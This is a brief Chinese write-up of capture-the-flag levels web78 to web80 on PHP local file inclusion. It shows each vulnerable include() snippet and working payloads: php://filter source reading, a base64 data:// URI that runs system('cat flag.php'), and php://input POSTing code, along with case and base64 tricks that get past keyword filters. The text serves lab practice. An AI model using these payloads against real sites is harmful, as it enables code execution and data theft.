参考
WEB78 无防护读取源码
<?PHP if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); }
payload:?file=PHP://filter/convert.base64-encode/resource=flag.PHP
web79 data协议
<?PHP if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("PHP", "???", $file); include($file); }else{ highlight_file(__FILE__); }
过滤了PHP,PHP到是可以用大写绕过,但是文件名flag.PHP中的PHP不能大小写,所以用cat这一类的函数,也可以直接base64绕过PHP
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?PHP system('cat flag.PHP'); ils/120361970
查看源代码
web80 input协议
<?PHP if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("PHP", "???", $file); $file = str_replace("data", "???", $file); include($file); }else{ highlight_file(__FILE__); }
PHP data被过滤
用input协议
继续使用PHP大小写绕过
GET: ?file=PHP://input POST: <?PHP system('tac fl*');?>
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。